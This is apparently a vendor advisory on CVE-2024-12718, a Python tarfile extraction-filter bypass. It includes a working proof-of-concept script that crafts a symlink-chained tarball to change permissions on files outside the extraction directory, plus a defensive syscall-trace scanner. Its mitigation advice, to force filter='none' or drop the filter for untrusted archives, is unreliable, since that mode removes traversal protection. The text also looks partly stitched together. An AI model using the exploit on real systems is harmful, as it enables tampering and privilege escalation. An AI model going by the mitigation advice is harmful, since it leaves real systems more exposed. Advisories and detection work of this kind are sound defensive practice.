A newly disclosed vulnerability in Python’s standard library, CVE-2024-12718, allows attackers to modify file metadata or file permissions outside the intended extraction directory. This issue affects systems running Python 3.12 and above when using tarfile.extract() or tarfile.extractall() with the filter parameter set to “data” or “tar”.

Though the vulnerability does not allow direct code execution, it originally received a CVSS score of 10.0 (Critical), reflecting its potential to break environment isolation, tamper with sensitive files, and aid privilege escalation, before being downgraded to Medium.

If you process untrusted tarballs in Python, pin filter="none" (or just drop the parameter), patch as soon as releases land, and monitor for suspicious utime/chmod syscalls.

Technical Breakdown

Vulnerability Details

The issue arises from the new filter parameter introduced in Python 3.12 to improve security during tar archive extraction. When used incorrectly, this filter fails to fully prevent manipulation of file metadata on targets outside the specified extraction directory.

Filter value    Risk introduced
"data"          Allows attackers to set timestamps (e.g., mtime) on arbitrary files
"tar"           Allows attackers to apply file permissions (chmod) on arbitrary files

Affected Configurations

  • Python 3.12 and later.
  • Use of tarfile.extract() or extractall() with filter="data" or filter="tar".
  • Python 3.14 and later are at higher risk, as filter="data" is the default behavior.

Vulnerability Details

The issue arises from improper filtering of file metadata when extracting archives with filter="data" or filter="tar". This lets malicious tarballs:

  • With filter="data": Modify timestamps (mtime) of files outside the extraction directory.
  • With filter="tar": Apply chmod changes to files outside the extraction directory.

These changes bypass the intended directory sandbox and affect unrelated or sensitive files elsewhere on the system.
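The summary above recommends monitoring for suspicious utime/chmod syscalls. The following is an added example, not part of the original advisory or of CPython, of what that check can look like: a small scanner over strace-style output (the "[pid] call(args) = ret" line shape and the constructed sample lines are assumptions, not something the advisory specifies) that flags metadata syscalls whose path lies outside the extraction root, whose path is inside the root lexically but resolves outside it through a symlink on disk, or which grant world-writable permissions. The symlink case is the one that matters for this bug: the extractor passes an in-tree path such as dest/pwn, so a purely lexical check sees nothing, and the real-path check only works while the extraction tree is still present.

```python
import os
import re
import tempfile

# Syscalls that write file metadata. The trace format assumed here is strace's
# "[pid N] call(args) = ret" / "N call(args) = ret" shape (an assumption).
METADATA_CALLS = ("chmod", "fchmodat", "utime", "utimes", "utimensat")
LINE_RE = re.compile(
    r"^(?:\[pid\s+\d+\]\s+|\d+\s+)?(?P<call>\w+)\((?P<args>.*)\)\s*=\s*(?P<ret>-?\d+)"
)
PATH_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Constructed sample trace (not a real capture): an extractor working in
# /srv/untar/job42 that then touches two paths it should never reach.
SAMPLE_TRACE = """\
4242 mkdir("/srv/untar/job42/docs", 0700) = 0
4242 openat(AT_FDCWD, "/srv/untar/job42/docs/readme.txt", O_WRONLY|O_CREAT|O_TRUNC|O_CLOEXEC, 0666) = 5
4242 fchmodat(AT_FDCWD, "/srv/untar/job42/docs/readme.txt", 0644) = 0
4242 utimensat(AT_FDCWD, "/srv/untar/job42/docs/readme.txt", [{tv_sec=1700000000, tv_nsec=0}, {tv_sec=1700000000, tv_nsec=0}], 0) = 0
4242 utimensat(AT_FDCWD, "/srv/untar/job42/pwn/../../../../var/log/auth.log", [{tv_sec=0, tv_nsec=0}, {tv_sec=0, tv_nsec=0}], 0) = 0
4242 fchmodat(AT_FDCWD, "/tmp/tmp.Q1w2e3", 0777) = 0
4242 chmod("/srv/untar/job42/docs", 0755) = 0
"""


def _under(root, path):
    """True if path is root itself or lies beneath it (both already normalised)."""
    return os.path.commonpath([root, path]) == root


def _mode_of(call, args):
    """Octal mode argument of chmod/fchmodat; None for the utime family."""
    if call not in ("chmod", "fchmodat"):
        return None
    last = args.rsplit(",", 1)[-1].strip()
    try:
        return int(last, 8)
    except ValueError:
        return None


def scan_trace(lines, root):
    """Return (call, path, reasons) for every metadata syscall that escapes root.

    Relative paths are taken relative to root (assumes the extractor's cwd was root).
    """
    root_lex = os.path.normpath(root)
    root_real = os.path.realpath(root)
    alerts = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["call"] not in METADATA_CALLS:
            continue
        p = PATH_RE.search(m["args"])
        if not p:
            continue
        path = p.group(1)
        if not os.path.isabs(path):
            path = os.path.join(root_lex, path)
        reasons = []
        # 1. The path as written already points outside the extraction root.
        if not _under(root_lex, os.path.normpath(path)):
            reasons.append("path outside root")
        # 2. Lexically inside, but a symlink on disk leads outside the root.
        #    Only meaningful while the extraction tree still exists.
        elif os.path.lexists(path) and not _under(root_real, os.path.realpath(path)):
            reasons.append("resolves outside root via symlink")
        # 3. Permission bits an archive should never need to grant.
        mode = _mode_of(m["call"], m["args"])
        if mode is not None and mode & 0o002:
            reasons.append("world-writable mode %o" % mode)
        if reasons:
            alerts.append((m["call"], path, reasons))
    return alerts


def sample_alerts():
    """Run the scanner over the constructed sample trace."""
    return scan_trace(SAMPLE_TRACE.splitlines(), "/srv/untar/job42")


def symlink_follow_case():
    """Constructed on-disk case: a symlink inside the root pointing at a file outside it."""
    root = tempfile.mkdtemp()
    outside = tempfile.NamedTemporaryFile(delete=False)
    outside.close()
    link = os.path.join(root, "link")
    os.symlink(outside.name, link)
    try:
        # In-tree path as an extractor would pass it; lexically it looks fine.
        return scan_trace(['fchmodat(AT_FDCWD, "%s", 0644) = 0' % link], root)
    finally:
        os.unlink(link)
        os.unlink(outside.name)
        os.rmdir(root)


if __name__ == "__main__":
    for call, path, reasons in sample_alerts() + symlink_follow_case():
        print(f"{call} {path}: {', '.join(reasons)}")
```

The sample trace yields two alerts (the utimensat that traverses out to /var/log/auth.log and the world-writable fchmodat on a /tmp file); the on-disk case yields one alert that only the real-path rule can see.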

Potential Exploit

While the vulnerability doesn’t directly allow code execution, it breaks directory confinement, leading to:

  • Privilege escalation: Attacker changes file permissions on sensitive files like /etc/shadow or SSH keys if the extracting process runs as root.
  • Sandbox escape: Many systems rely on extraction directories for isolation; this vulnerability breaks that boundary.
  • Tampering and evasion: By changing file timestamps, attackers can obscure logs or mislead incident response.
  • Trivial exploitation: Crafting a malicious tarball is simple and doesn’t require special tools.

Exploit Example

This exploit was shown in this thread. Here is a simplified demonstration of what a malicious tarball might do:

#!/usr/bin/python3
# Attacker's workspace: malicious_tar.py

import argparse
import os
import tarfile

ap = argparse.ArgumentParser()
ap.add_argument('tarpath', metavar='TARBALL')
ap.add_argument('target', metavar='TARGET')
opts = ap.parse_args()
target = os.path.abspath(opts.target)

with tarfile.open(opts.tarpath, 'w') as tar:

    def addmemb(name, **kwargs):
        memb = tarfile.TarInfo(name)
        for k, v in kwargs.items():
            getattr(memb, k)  # fail loudly on a misspelled TarInfo field
            setattr(memb, k, v)
        tar.addfile(memb)

    # lrw-r--r-- pwn -> .
    addmemb('pwn', type=tarfile.SYMTYPE, linkname='.')
    # "pwn" is a very innocent symlink.

    # drwxrwxrwx pwn/
    addmemb('pwn', type=tarfile.DIRTYPE, mode=0o777)
    # But now "pwn" is also a directory, so it's scheduled to have its
    # metadata updated later.

    # lrw-r--r-- pwn -> x/x/x/x/⋯⋯⋯/x/../../../../⋯⋯⋯/../TARGET
    addmemb('pwn', type=tarfile.SYMTYPE, linkname=('x/' * 99 + '../' * 99 + target))
    # Oops, "pwn" is not so innocent any more.
    # But technically it's still pointing inside the dest dir,
    # so it doesn't upset the "data" filter.

    # lrw-r--r-- x/x/x/x/⋯⋯⋯/x -> ../../../⋯⋯⋯/..
    addmemb(('x/' * 99), type=tarfile.SYMTYPE, linkname=('../' * 98))
    # The newly created symlink points to the dest dir,
    # so it's OK for the "data" filter.
    # But now "pwn" points to the target (outside the dest dir).


#!/bin/sh
# Attacker's workspace: run.sh

target=$(mktemp)                       # the file whose permissions will be changed
./malicious_tar.py mal.tar "$target"   # build the archive aimed at it
ls -l "$target"                        # permissions before extraction
python3 -m tarfile --filter=tar -e mal.tar "$(mktemp -d)"   # extract into a fresh dir
ls -l "$target"                        # permissions after extraction


After this runs, the second ls -l shows that the target file, which lies outside the extraction directory, may now have world-readable permissions.

If a victim extracts this tar archive in their workspace, an attacker could manipulate the permissions of a specific file on the victim’s system.

Recommendations

Mitigation Steps

  • Avoid extracting untrusted tarballs entirely.
  • Do not pass filter="tar" or filter="data" for untrusted archives. If you must unpack, force filter="none" and run in a dedicated, non-privileged container/VM.

Patch Status

There is no official patch as of June 2025, but users should:

  • Watch for updates from the Python Software Foundation.
  • Review archive handling workflows in CI/CD, web apps, and internal tooling.

How Upwind Protects Against CVE-2024-12718 and Similar Threats


Upwind helps you stay protected against file-based vulnerabilities like CVE-2024-12718 with a combination of visibility and real-time detection:

  • SBOM Explorer: Instantly see all software packages and their versions across your environments to identify systems running vulnerable Python versions (3.12+).
  • Runtime Threat Detection: Detect unusual file activity and get real-time alerts.
  • Faster Response, Less Noise: Focus on real exploitation attempts by correlating package exposure with observed runtime behavior.

With Upwind, your team can move from vulnerability awareness to actionable defense. To learn more about how Upwind protects you from CVE-2024-12718, schedule a demo.